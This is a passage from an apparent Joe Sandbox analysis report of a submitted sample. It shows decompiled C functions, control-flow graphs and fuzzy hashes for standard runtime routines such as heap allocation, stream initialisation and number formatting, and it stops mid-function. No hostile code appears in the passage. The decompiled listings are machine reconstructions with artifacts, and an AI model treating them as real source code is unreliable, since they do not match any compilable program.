                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 1d3597f54fadd2870ecdafcdfc744e13afaba6a38e74f7b4d6d46bfaeee461a6
                                                • Instruction ID: d86132e09527048ce2ac091b509f8e4d2342b75eea4a9d4209b24b07612e5f28
                                                • Opcode Fuzzy Hash: 1d3597f54fadd2870ecdafcdfc744e13afaba6a38e74f7b4d6d46bfaeee461a6
                                                • Instruction Fuzzy Hash: 3FF0E932604630AADB216B669C55BDB3BC8BF71760F154065FC1CDA1B5CB78DC0096E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 322 1b6429-1b6435 323 1b6467-1b6472 call 1aff41 322->323 324 1b6437-1b6439 322->324 331 1b6474-1b6476 323->331 326 1b643b-1b643c 324->326 327 1b6452-1b6463 RtlAllocateHeap 324->327 326->327 329 1b643e-1b6445 call 1b56e4 327->329 330 1b6465 327->330 329->323 334 1b6447-1b6450 call 1b3362 329->334 330->331 334->323 334->327
                                                C-Code - Quality: 100%
                                                			E001B6429(long _a4) {
                                                				void* _t4;
                                                				void* _t6;
                                                				long _t8;
                                                
                                                				_t8 = _a4;
                                                				if(_t8 > 0xffffffe0) {
                                                					L7:
                                                					 *((intOrPtr*)(E001AFF41())) = 0xc;
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				if(_t8 == 0) {
                                                					_t8 = _t8 + 1;
                                                				}
                                                				while(1) {
                                                					_t4 = RtlAllocateHeap( *0x203554, 0, _t8); // executed
                                                					if(_t4 != 0) {
                                                						break;
                                                					}
                                                					__eflags = E001B56E4();
                                                					if(__eflags == 0) {
                                                						goto L7;
                                                					}
                                                					_t6 = E001B3362(__eflags, _t8);
                                                					__eflags = _t6;
                                                					if(_t6 == 0) {
                                                						goto L7;
                                                					}
                                                				}
                                                				return _t4;
                                                			}






                                                0x001b642f
                                                0x001b6435
                                                0x001b6467
                                                0x001b646c
                                                0x001b6472
                                                0x00000000
                                                0x001b6472
                                                0x001b6439
                                                0x001b643b
                                                0x001b643b
                                                0x001b6452
                                                0x001b645b
                                                0x001b6463
                                                0x00000000
                                                0x00000000
                                                0x001b6443
                                                0x001b6445
                                                0x00000000
                                                0x00000000
                                                0x001b6448
                                                0x001b644e
                                                0x001b6450
                                                0x00000000
                                                0x00000000
                                                0x001b6450
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,001A956D,?,?,001A5EC7,?,001A1573,?), ref: 001B645B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: c09c2a748ca29194cea03a0edb478fbb1a7dea8572a3008e4fcae1723467573f
                                                • Instruction ID: c79d0b8eef7488e94fd32547aef5834a46cff045f7f63693692c60a894540819
                                                • Opcode Fuzzy Hash: c09c2a748ca29194cea03a0edb478fbb1a7dea8572a3008e4fcae1723467573f
                                                • Instruction Fuzzy Hash: ABE09232245E219BDB2127A9AC05BEB7A4CEF727A0F1601B2FC54965D2CB68DC0092E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 337 1a8284-1a82a9 call 1a6dad call 1a884f 342 1a82bb-1a82bf 337->342 343 1a82ab-1a82b6 call 1a2130 337->343 345 1a82c8-1a82ca 342->345 346 1a82c1-1a82c7 call 1a90b9 342->346 343->342 346->345
                                                C-Code - Quality: 82%
                                                			E001A8284(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, char _a8) {
                                                				void* __esi;
                                                				void* __ebp;
                                                				char _t11;
                                                				void* _t20;
                                                
                                                				_t20 = __ecx;
                                                				E001A6DAD(__ebx, __ecx, __edi, __ecx, __eflags);
                                                				_t17 = __ecx;
                                                				 *(__ecx + 0x3c) =  *(__ecx + 0x3c) & 0x00000000;
                                                				 *((intOrPtr*)(__ecx + 0x38)) = _a4;
                                                				_t11 = E001A884F(__ebx, __ecx, __edi, __ecx, __eflags, 0x20); // executed
                                                				 *((char*)(_t20 + 0x40)) = _t11;
                                                				if( *((intOrPtr*)(_t20 + 0x38)) == 0) {
                                                					_t17 = _t20;
                                                					_push(0);
                                                					_t11 = E001A2130(_t20,  *(_t20 + 0xc) | 0x00000004);
                                                				}
                                                				if(_a8 != 0) {
                                                					return E001A90B9(_t17, _t20);
                                                				}
                                                				return _t11;
                                                			}







                                                0x001a8288
                                                0x001a828a
                                                0x001a8292
                                                0x001a8294
                                                0x001a829a
                                                0x001a829d
                                                0x001a82a6
                                                0x001a82a9
                                                0x001a82ae
                                                0x001a82b0
                                                0x001a82b6
                                                0x001a82b6
                                                0x001a82bf
                                                0x00000000
                                                0x001a82c7
                                                0x001a82ca

                                                APIs
                                                • std::ios_base::_Init.LIBCPMT ref: 001A828A
                                                  • Part of subcall function 001A6DAD: __EH_prolog3.LIBCMT ref: 001A6DB4
                                                  • Part of subcall function 001A6DAD: std::locale::_Init.LIBCPMT ref: 001A6DFD
                                                  • Part of subcall function 001A884F: __EH_prolog3.LIBCMT ref: 001A8856
                                                  • Part of subcall function 001A2130: ___std_exception_copy.LIBVCRUNTIME ref: 001A21CD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: H_prolog3Init$___std_exception_copystd::ios_base::_std::locale::_
                                                • String ID:
                                                • API String ID: 2400365081-0
                                                • Opcode ID: f2e7450045d9fe41d65e6d3bf0622d9e1d2f34e27008560709e57e44bbaf49eb
                                                • Instruction ID: 1191c48226b364fc393543621aaa88807e61446479f828763c9924b8fd25f4fd
                                                • Opcode Fuzzy Hash: f2e7450045d9fe41d65e6d3bf0622d9e1d2f34e27008560709e57e44bbaf49eb
                                                • Instruction Fuzzy Hash: CFF0E535200B505BEB70AA659449B6B7BD8AB22334F00440EF58247A82CFB5F440C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E001A884F(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr* _t13;
                                                				void* _t15;
                                                				void* _t32;
                                                
                                                				E001A9A79(0x1c6a7d, __ebx, __edi, __esi);
                                                				E001A1B20(_t32 - 0x14,  *((intOrPtr*)(__ecx + 0x30)));
                                                				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                                				_t13 = E001A7B14(); // executed
                                                				 *0x1c7144( *((intOrPtr*)(_t32 + 8)), _t32 - 0x14, 8);
                                                				_t15 =  *((intOrPtr*)( *((intOrPtr*)( *_t13 + 0x20))))();
                                                				E001A1B40(_t32 - 0x14);
                                                				return E001A9A56(_t15);
                                                			}






                                                0x001a8856
                                                0x001a8861
                                                0x001a8866
                                                0x001a886e
                                                0x001a8880
                                                0x001a8888
                                                0x001a888f
                                                0x001a889b

                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 001A8856
                                                  • Part of subcall function 001A7B14: __EH_prolog3.LIBCMT ref: 001A7B1B
                                                  • Part of subcall function 001A7B14: std::_Lockit::_Lockit.LIBCPMT ref: 001A7B25
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: H_prolog3$LockitLockit::_std::_
                                                • String ID:
                                                • API String ID: 2181796688-0
                                                • Opcode ID: 3e850104c372e58c76e1b52523946391e13100156280288568c9b57d8f87f05e
                                                • Instruction ID: 3ee197c5595d31b3cac3fa7a40ea4b2a5b53e4999cd4de195eb5c989878558dd
                                                • Opcode Fuzzy Hash: 3e850104c372e58c76e1b52523946391e13100156280288568c9b57d8f87f05e
                                                • Instruction Fuzzy Hash: 63E0657DA00105AFCF04FB60C511AED77B1FF65351F104049E442A7282DF349E09CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E001A7BA9(intOrPtr* __ecx) {
                                                				void* _t31;
                                                				void* _t36;
                                                				void* _t37;
                                                				intOrPtr* _t38;
                                                				void* _t39;
                                                
                                                				_push(8);
                                                				E001A9A79(0x1c68ea, _t31, _t36, _t37);
                                                				_t38 = __ecx;
                                                				 *((intOrPtr*)(_t39 - 0x14)) = __ecx;
                                                				 *((intOrPtr*)(_t39 - 0x10)) = 0;
                                                				if( *((intOrPtr*)(_t39 + 0x10)) != 0) {
                                                					 *__ecx = 0x1c7484;
                                                					 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                					 *((intOrPtr*)(__ecx + 0x30)) = 0;
                                                					 *((intOrPtr*)(__ecx + 0x34)) = 0;
                                                					 *((intOrPtr*)(__ecx + 0x38)) = 0;
                                                					 *((intOrPtr*)(__ecx + 8)) = 0x1c7478;
                                                					 *((intOrPtr*)(_t39 - 4)) = 0;
                                                					 *((intOrPtr*)(_t39 - 0x10)) = 1;
                                                				}
                                                				 *((intOrPtr*)(_t38 +  *((intOrPtr*)( *_t38 + 4)))) = 0x1c7480;
                                                				_t16 =  *((intOrPtr*)( *_t38 + 4)) - 8; // -8
                                                				 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 4)) + _t38 - 4)) = _t16;
                                                				E001A8284(_t31,  *((intOrPtr*)( *_t38 + 4)) + _t38, _t36,  *((intOrPtr*)( *_t38 + 4)) + _t38,  *((intOrPtr*)(_t39 + 8)),  *((intOrPtr*)(_t39 + 0xc)));
                                                				return E001A9A56(_t38);
                                                			}








                                                0x001a7ba9
                                                0x001a7bb0
                                                0x001a7bb5
                                                0x001a7bb7
                                                0x001a7bbc
                                                0x001a7bc2
                                                0x001a7bc4
                                                0x001a7bca
                                                0x001a7bcd
                                                0x001a7bd0
                                                0x001a7bd3
                                                0x001a7bd6
                                                0x001a7bdd
                                                0x001a7be0
                                                0x001a7be0
                                                0x001a7bf2
                                                0x001a7bfe
                                                0x001a7c01
                                                0x001a7c0c
                                                0x001a7c18

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 651dc7dd291d4efcf7887b64bc8b54cad5722533ee9e5a642add14b94cb2197d
                                                • Instruction ID: bd433e1b77c360eb5e08c2d67a2335663cb17c357414ef95b0a5d58c305a67b4
                                                • Opcode Fuzzy Hash: 651dc7dd291d4efcf7887b64bc8b54cad5722533ee9e5a642add14b94cb2197d
                                                • Instruction Fuzzy Hash: 55F0A578610219CFCB55DF68C944E59BBF0BF19304B15885EE889DB351D772DA40CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 61%
                                                			E001B59C8(void* __eflags) {
                                                				intOrPtr _t14;
                                                				void* _t18;
                                                				void* _t20;
                                                				void* _t22;
                                                				void* _t23;
                                                				void* _t24;
                                                
                                                				_push(0x10);
                                                				E001A9A79(0x1c6b0e, _t20, _t22, _t23);
                                                				 *((intOrPtr*)(_t24 - 0x18)) = _t24 + 8;
                                                				_t3 = _t24 - 4;
                                                				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                                                				_t14 = 2;
                                                				 *((intOrPtr*)(_t24 - 0x14)) = _t14;
                                                				 *((intOrPtr*)(_t24 - 0x1c)) = _t14;
                                                				_push(_t24 - 0x14);
                                                				_push(_t24 - 0x18);
                                                				_push(_t24 - 0x1c); // executed
                                                				_t18 = E001B5720(_t20, _t22, _t23,  *_t3); // executed
                                                				return E001A9A56(_t18);
                                                			}









                                                0x001b59c8
                                                0x001b59cf
                                                0x001b59d7
                                                0x001b59da
                                                0x001b59da
                                                0x001b59e3
                                                0x001b59e4
                                                0x001b59e7
                                                0x001b59ed
                                                0x001b59f1
                                                0x001b59f5
                                                0x001b59f6
                                                0x001b5a00

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 94c787029f85cbf85f3b5948e3fa3b2c1cb45dd2bfbe4262466263f124307d45
                                                • Instruction ID: fbfd534b70f179e91b149b2920083c2ccf6a6977b51616c29e6949b1f66ddd2d
                                                • Opcode Fuzzy Hash: 94c787029f85cbf85f3b5948e3fa3b2c1cb45dd2bfbe4262466263f124307d45
                                                • Instruction Fuzzy Hash: A1E09AB6D4020DAADB01DFE4C542BEFBBB8AB14300F508027E205E7141EB749785CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E001C226A(signed int __edx, void* __edi, void* __eflags, signed char _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, intOrPtr _a28) {
                                                				signed int _v8;
                                                				signed int _v464;
                                                				void _v468;
                                                				signed int _v472;
                                                				signed int _v932;
                                                				signed int _v936;
                                                				signed int _v1392;
                                                				signed int _v1396;
                                                				signed int _v1400;
                                                				char _v1860;
                                                				signed int _v1864;
                                                				signed int _v1868;
                                                				signed int _v1872;
                                                				signed int _v1876;
                                                				signed int _v1880;
                                                				char _v1881;
                                                				signed int _v1888;
                                                				signed int _v1892;
                                                				signed int _v1896;
                                                				signed int _v1900;
                                                				signed int _v1904;
                                                				signed int _v1908;
                                                				intOrPtr _v1912;
                                                				signed int* _v1916;
                                                				signed int _v1920;
                                                				signed int _v1924;
                                                				signed int _v1928;
                                                				signed int _v1932;
                                                				signed int _v1936;
                                                				char _v1944;
                                                				signed int _v1952;
                                                				signed int _v1956;
                                                				char _v2416;
                                                				signed int _v2420;
                                                				signed int _v2448;
                                                				void* __ebx;
                                                				void* __esi;
                                                				signed int _t802;
                                                				intOrPtr _t812;
                                                				signed int _t819;
                                                				signed int _t825;
                                                				void* _t829;
                                                				signed int _t830;
                                                				intOrPtr _t836;
                                                				void* _t837;
                                                				signed int _t843;
                                                				signed int _t848;
                                                				signed int _t849;
                                                				signed int _t850;
                                                				signed int _t853;
                                                				signed int _t855;
                                                				signed int _t857;
                                                				signed int _t858;
                                                				signed int _t863;
                                                				signed int _t864;
                                                				signed int _t869;
                                                				signed int _t871;
                                                				signed int _t872;
                                                				signed int _t879;
                                                				signed int _t880;
                                                				signed int _t888;
                                                				signed int _t891;
                                                				signed int _t896;
                                                				signed int* _t899;
                                                				signed int _t903;
                                                				signed int _t914;
                                                				signed int _t915;
                                                				signed int _t917;
                                                				signed int _t918;
                                                				char* _t919;
                                                				signed int _t922;
                                                				signed int _t928;
                                                				signed int _t930;
                                                				signed int _t934;
                                                				signed int _t942;
                                                				signed int _t945;
                                                				signed int _t948;
                                                				signed int _t951;
                                                				signed int _t960;
                                                				signed int _t961;
                                                				signed int _t964;
                                                				signed int _t977;
                                                				signed int _t978;
                                                				signed int _t980;
                                                				signed int _t981;
                                                				signed int* _t982;
                                                				signed int _t985;
                                                				signed int* _t988;
                                                				signed int _t991;
                                                				signed int _t993;
                                                				signed int _t998;
                                                				signed int _t1006;
                                                				signed int _t1009;
                                                				signed int _t1013;
                                                				signed int _t1016;
                                                				signed int _t1025;
                                                				intOrPtr _t1030;
                                                				signed int _t1031;
                                                				signed int _t1037;
                                                				void* _t1045;
                                                				signed int _t1046;
                                                				signed int _t1047;
                                                				signed int _t1048;
                                                				signed int* _t1051;
                                                				signed int _t1059;
                                                				signed int _t1063;
                                                				signed int _t1065;
                                                				signed int _t1070;
                                                				void* _t1076;
                                                				signed int _t1077;
                                                				signed int _t1078;
                                                				signed int _t1079;
                                                				signed int _t1082;
                                                				signed int _t1087;
                                                				signed int _t1088;
                                                				signed int _t1092;
                                                				signed int _t1094;
                                                				signed int _t1099;
                                                				signed int _t1101;
                                                				signed int _t1102;
                                                				void* _t1105;
                                                				signed char _t1106;
                                                				signed int _t1112;
                                                				signed int _t1113;
                                                				signed int _t1115;
                                                				signed int _t1122;
                                                				void* _t1127;
                                                				signed char _t1133;
                                                				intOrPtr* _t1136;
                                                				signed int _t1141;
                                                				signed int _t1142;
                                                				void* _t1144;
                                                				signed int _t1147;
                                                				signed int _t1149;
                                                				signed int _t1150;
                                                				signed int _t1151;
                                                				signed int _t1158;
                                                				signed int _t1162;
                                                				signed int _t1163;
                                                				signed int _t1164;
                                                				signed int _t1165;
                                                				signed int _t1167;
                                                				signed int* _t1169;
                                                				signed int _t1170;
                                                				signed int _t1174;
                                                				signed int _t1175;
                                                				signed int _t1176;
                                                				signed int _t1177;
                                                				signed int _t1179;
                                                				signed int _t1181;
                                                				signed int _t1182;
                                                				signed int _t1186;
                                                				signed int _t1187;
                                                				unsigned int _t1188;
                                                				unsigned int _t1192;
                                                				unsigned int _t1195;
                                                				signed int _t1196;
                                                				signed int _t1199;
                                                				signed int* _t1202;
                                                				signed int _t1205;
                                                				void* _t1207;
                                                				unsigned int _t1208;
                                                				signed int _t1209;
                                                				signed int _t1212;
                                                				signed int* _t1215;
                                                				signed int _t1218;
                                                				signed char _t1220;
                                                				signed int _t1227;
                                                				signed int _t1228;
                                                				signed int _t1229;
                                                				signed int _t1230;
                                                				signed int _t1233;
                                                				signed int _t1235;
                                                				signed int _t1237;
                                                				char _t1240;
                                                				signed int _t1242;
                                                				signed int _t1243;
                                                				signed int _t1244;
                                                				signed int _t1245;
                                                				signed int _t1246;
                                                				signed int _t1247;
                                                				signed int _t1248;
                                                				signed int _t1250;
                                                				signed int _t1251;
                                                				signed int _t1252;
                                                				signed int _t1253;
                                                				signed int _t1254;
                                                				void* _t1255;
                                                				signed int _t1256;
                                                				signed int _t1258;
                                                				signed int _t1263;
                                                				signed int _t1267;
                                                				void* _t1268;
                                                				intOrPtr _t1269;
                                                				void* _t1272;
                                                				unsigned int _t1275;
                                                				signed int _t1276;
                                                				void* _t1277;
                                                				signed int _t1279;
                                                				signed int _t1280;
                                                				signed int _t1281;
                                                				signed int _t1282;
                                                				signed int _t1285;
                                                				signed int _t1286;
                                                				signed int _t1287;
                                                				signed int _t1288;
                                                				signed int _t1289;
                                                				signed int _t1292;
                                                				signed int _t1293;
                                                				signed int _t1294;
                                                				signed int _t1295;
                                                				void* _t1296;
                                                				void* _t1299;
                                                				signed int _t1301;
                                                				signed int _t1305;
                                                				signed int* _t1307;
                                                				signed int _t1311;
                                                				signed int _t1312;
                                                				signed int _t1315;
                                                				signed int _t1317;
                                                				signed int _t1318;
                                                				signed int _t1320;
                                                				void* _t1323;
                                                				void* _t1324;
                                                				signed int _t1326;
                                                				signed int _t1327;
                                                				signed int _t1328;
                                                				signed int _t1330;
                                                				signed int _t1331;
                                                				signed int _t1332;
                                                				signed int _t1334;
                                                				signed int _t1344;
                                                				void* _t1346;
                                                				signed char* _t1347;
                                                				signed char* _t1348;
                                                				signed int _t1352;
                                                				signed char _t1360;
                                                
                                                				_t1268 = __edi;
                                                				_t1227 = __edx;
                                                				_t802 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t802 ^ _t1344;
                                                				_v1932 = _a20;
                                                				_v1888 = _a24;
                                                				E001C5132(__eflags,  &_v1952);
                                                				_t1122 = 1;
                                                				if((_v1952 & 0x0000001f) != 0x1f) {
                                                					E001C519A(__eflags,  &_v1952);
                                                					_v1944 = 1;
                                                				} else {
                                                					_v1944 = 0;
                                                				}
                                                				_t1315 = _a8;
                                                				_push(_t1268);
                                                				_t1269 = 0x20;
                                                				_t1352 = _t1315;
                                                				if(_t1352 > 0 || _t1352 >= 0 && _a4 >= 0) {
                                                					_t812 = _t1269;
                                                				} else {
                                                					_t812 = 0x2d;
                                                				}
                                                				_t1136 = _v1932;
                                                				 *_t1136 = _t812;
                                                				 *((intOrPtr*)(_t1136 + 8)) = _v1888;
                                                				E001B5B9F( &_v1956, 0, 0);
                                                				_t1347 = _t1346 + 0xc;
                                                				if((_t1315 & 0x7ff00000) != 0) {
                                                					L12:
                                                					_t819 = E001B6533( &_a4);
                                                					__eflags = _t819;
                                                					if(_t819 == 0) {
                                                						L24:
                                                						_v1936 = _v1936 & 0x00000000;
                                                						_a8 = _t1315 & 0x7fffffff;
                                                						_t1360 = _a4;
                                                						asm("fst qword [ebp-0x774]");
                                                						_t1317 = _v1908;
                                                						_v1928 = _a12 + 1;
                                                						_t1141 = _t1317 >> 0x14;
                                                						_t825 = _t1141 & 0x000007ff;
                                                						__eflags = _t825;
                                                						if(_t825 != 0) {
                                                							_t825 = 0;
                                                							_t1228 = 0x100000;
                                                							_t41 =  &_v1868;
                                                							 *_t41 = _v1868 & 0;
                                                							__eflags =  *_t41;
                                                						} else {
                                                							_t1228 = 0;
                                                							_v1868 = _t1122;
                                                						}
                                                						_t1318 = _t1317 & 0x000fffff;
                                                						_v1924 = _v1912 + _t825;
                                                						asm("adc esi, edx");
                                                						_t1142 = _t1141 & 0x000007ff;
                                                						_v1872 = _v1868 + _t1142;
                                                						E001C51F0(_t1142, _t1360);
                                                						_push(_t1142);
                                                						 *_t1347 = _t1360;
                                                						_t829 = E001C5300(_t1142);
                                                						_t1144 = _t1142;
                                                						_t830 = L001C6340(_t829, _t1122, _t1144, _t1228);
                                                						_v1904 = _t830;
                                                						_t1272 = 0x20;
                                                						__eflags = _t830 - 0x7fffffff;
                                                						if(_t830 == 0x7fffffff) {
                                                							L29:
                                                							__eflags = 0;
                                                							_v1904 = 0;
                                                						} else {
                                                							__eflags = _t830 - 0x80000000;
                                                							if(_t830 == 0x80000000) {
                                                								goto L29;
                                                							}
                                                						}
                                                						_t1229 = _v1872;
                                                						__eflags = _t1318;
                                                						_v468 = _v1924;
                                                						_v464 = _t1318;
                                                						_t1147 = (0 | _t1318 != 0x00000000) + 1;
                                                						_v1868 = _t1147;
                                                						_v472 = _t1147;
                                                						__eflags = _t1229 - 0x433;
                                                						if(_t1229 < 0x433) {
                                                							__eflags = _t1229 - 0x35;
                                                							if(_t1229 == 0x35) {
                                                								L100:
                                                								__eflags = _t1318;
                                                								_t211 =  &_v1908;
                                                								 *_t211 = _v1908 & 0x00000000;
                                                								__eflags =  *_t211;
                                                								_t836 =  *((intOrPtr*)(_t1344 + 4 + (0 | _t1318 != 0x00000000) * 4 - 0x1d4));
                                                								asm("bsr eax, eax");
                                                								if( *_t211 == 0) {
                                                									_t837 = 0;
                                                									__eflags = 0;
                                                								} else {
                                                									_t837 = _t836 + 1;
                                                								}
                                                								__eflags = _t1272 - _t837 - _t1122;
                                                								asm("sbb esi, esi");
                                                								_t1320 =  ~_t1318 + _t1147;
                                                								__eflags = _t1320 - 0x73;
                                                								if(_t1320 <= 0x73) {
                                                									_t1230 = _t1320 - 1;
                                                									__eflags = _t1230 - 0xffffffff;
                                                									if(_t1230 != 0xffffffff) {
                                                										_t1296 = _t1230 - 1;
                                                										while(1) {
                                                											__eflags = _t1230 - _t1147;
                                                											if(_t1230 >= _t1147) {
                                                												_t1025 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												_t1025 =  *(_t1344 + _t1230 * 4 - 0x1d0);
                                                											}
                                                											__eflags = _t1296 - _t1147;
                                                											if(_t1296 >= _t1147) {
                                                												_t1188 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												_t1188 =  *(_t1344 + _t1230 * 4 - 0x1d4);
                                                											}
                                                											 *(_t1344 + _t1230 * 4 - 0x1d0) = _t1188 >> 0x0000001f | _t1025 + _t1025;
                                                											_t1230 = _t1230 - 1;
                                                											_t1296 = _t1296 - 1;
                                                											__eflags = _t1230 - 0xffffffff;
                                                											if(_t1230 == 0xffffffff) {
                                                												goto L115;
                                                											}
                                                											_t1147 = _v472;
                                                										}
                                                									}
                                                									L115:
                                                									_v472 = _t1320;
                                                								} else {
                                                									_v1400 = _v1400 & 0x00000000;
                                                									_v472 = _v472 & 0x00000000;
                                                									E001B1F5E( &_v468, 0x1cc,  &_v1396, 0);
                                                									_t1347 =  &(_t1347[0x10]);
                                                								}
                                                								_t1275 = 0x434 >> 5;
                                                								E001AAF60(0x434 >> 5,  &_v1396, 0, 0x434);
                                                								__eflags = 1;
                                                								 *(_t1344 + 0xbad63d) = 1 << (0x00000434 - _v1872 & 0x0000001f);
                                                							} else {
                                                								_v1396 = _v1396 & 0x00000000;
                                                								_v1392 = 0x100000;
                                                								_v1400 = 2;
                                                								__eflags = _t1318;
                                                								if(_t1318 != 0) {
                                                									_t1255 = 0;
                                                									__eflags = 0;
                                                									while(1) {
                                                										_t1030 =  *((intOrPtr*)(_t1344 + _t1255 - 0x570));
                                                										__eflags = _t1030 -  *((intOrPtr*)(_t1344 + _t1255 - 0x1d0));
                                                										if(_t1030 !=  *((intOrPtr*)(_t1344 + _t1255 - 0x1d0))) {
                                                											goto L100;
                                                										}
                                                										_t1255 = _t1255 + 4;
                                                										__eflags = _t1255 - 8;
                                                										if(_t1255 != 8) {
                                                											continue;
                                                										} else {
                                                											__eflags = 0;
                                                											asm("bsr eax, esi");
                                                											_v1908 = 0;
                                                											if(0 == 0) {
                                                												_t1031 = 0;
                                                											} else {
                                                												_t1031 = _t1030 + 1;
                                                											}
                                                											__eflags = _t1272 - _t1031 - 2;
                                                											asm("sbb esi, esi");
                                                											_t1334 =  ~_t1318 + _t1147;
                                                											__eflags = _t1334 - 0x73;
                                                											if(_t1334 <= 0x73) {
                                                												_t1256 = _t1334 - 1;
                                                												__eflags = _t1256 - 0xffffffff;
                                                												if(_t1256 != 0xffffffff) {
                                                													_t1299 = _t1256 - 1;
                                                													while(1) {
                                                														__eflags = _t1256 - _t1147;
                                                														if(_t1256 >= _t1147) {
                                                															_t1037 = 0;
                                                														} else {
                                                															_t1037 =  *(_t1344 + _t1256 * 4 - 0x1d0);
                                                														}
                                                														__eflags = _t1299 - _t1147;
                                                														if(_t1299 >= _t1147) {
                                                															_t1192 = 0;
                                                														} else {
                                                															_t1192 =  *(_t1344 + _t1256 * 4 - 0x1d4);
                                                														}
                                                														 *(_t1344 + _t1256 * 4 - 0x1d0) = _t1192 >> 0x0000001e | _t1037 << 0x00000002;
                                                														_t1256 = _t1256 - 1;
                                                														_t1299 = _t1299 - 1;
                                                														__eflags = _t1256 - 0xffffffff;
                                                														if(_t1256 == 0xffffffff) {
                                                															goto L98;
                                                														}
                                                														_t1147 = _v472;
                                                													}
                                                												}
                                                												L98:
                                                												_v472 = _t1334;
                                                											} else {
                                                												_v1400 = 0;
                                                												_v472 = 0;
